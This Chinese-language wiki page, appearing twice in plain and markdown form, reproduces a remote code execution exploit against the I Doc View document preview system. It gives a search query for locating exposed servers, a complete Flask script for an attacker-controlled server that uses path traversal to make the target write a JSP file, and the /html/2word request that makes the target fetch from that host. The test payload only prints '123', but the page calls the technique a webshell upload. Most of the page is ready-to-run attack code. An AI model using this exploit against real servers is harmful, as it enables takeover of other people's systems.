fofamini-wiki

登录白背景

源码

I Doc View在线文档预览系统2word存在远程代码执行漏洞

一、漏洞简介

I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统，用于在Web环境中展示和预览各种文档类型，如文本文档、电子表格、演示文稿、PDF文件等。I Doc View在线文档预览系统远程代码执行漏洞情报。攻击者可利用该漏洞使服务器下载恶意文件，获取服务器控制权限。

二、影响版本

I Doc View

三、资产测绘

hunterapp.name="I Doc View"
特征

四、漏洞复现

将下列脚本放到vps服务器上安装flsk

main.py

from flask import Flask

app = Flask(__name__)

@app.route('/index.html')
def step1():
    return '''<link href="/..\\..\\..\\docview\\1.jsp">'''

@app.route('/..\\..\\..\\docview\\1.jsp')
def step2():
    return '''<% 
    out.print("123");
    %>'''

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=8088)

pip3 install flask

运行该脚本，将在8088端口上启用一个web服务器

python3 main.py

通过poc远程下载webshell,url为上一步地址

/html/2word?url=http://xx.xx.xx.xx/index.html

下载文件地址

/1.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/glg6ed7epyc6gg0l

# I Doc View在线文档预览系统2word存在远程代码执行漏洞

# 一、漏洞简介
I Doc View在线文档预览系统是由北京卓软在线信息技术有限公司开发的一套系统，用于在Web环境中展示和预览各种文档类型，如文本文档、电子表格、演示文稿、PDF文件等。I Doc View在线文档预览系统远程代码执行漏洞情报。攻击者可利用该漏洞使服务器下载恶意文件，获取服务器控制权限。

# 二、影响版本

- I Doc View

# 三、资产测绘

- hunter`app.name="I Doc View"`
- 特征

![image.png](./img/FtJkwQE26ffn1Y59/1700665332845-edacffd9-0f66-4242-af22-318649c41ae8-594974.png)

# 四、漏洞复现

1. 将下列脚本放到vps服务器上安装`flsk`

[main.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222144709-b9f8556d-4733-491b-bc1b-6a6a29527dc6.py?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fpy%2F1622799%2F1709222144709-b9f8556d-4733-491b-bc1b-6a6a29527dc6.py%22%2C%22name%22%3A%22main.py%22%2C%22size%22%3A318%2C%22ext%22%3A%22py%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u18d00692-2a74-4df4-b8b7-4371cfa644d%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22text%2Fx-python-script%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u6185071f%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
```python
from flask import Flask

app = Flask(__name__)

@app.route('/index.html')
def step1():
    return '''<link href="/..\\..\\..\\docview\\1.jsp">'''

@app.route('/..\\..\\..\\docview\\1.jsp')
def step2():
    return '''<% 
    out.print("123");
    %>'''

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=8088)
```
```python
pip3 install flask
```
![image.png](./img/FtJkwQE26ffn1Y59/1700665422431-54cf97dc-f19f-4abc-9411-f387578f4310-298130.png)

2. 运行该脚本，将在`8088`端口上启用一个web服务器
```python
python3 main.py
```
![image.png](./img/FtJkwQE26ffn1Y59/1700665477109-9ecf85c2-12af-4157-85df-d14204e01ef7-401909.png)

3. 通过poc远程下载`webshell`,`url`为上一步地址
```python
/html/2word?url=http://xx.xx.xx.xx/index.html
```
![image.png](./img/FtJkwQE26ffn1Y59/1700665696536-ee133036-1b7a-45cb-85ad-679aa49ef7ad-294393.png)

4. 下载文件地址
```python
/1.jsp
```
![image.png](./img/FtJkwQE26ffn1Y59/1700665726886-4c84390d-4d48-4808-831e-1590ac63bdde-494405.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/glg6ed7epyc6gg0l>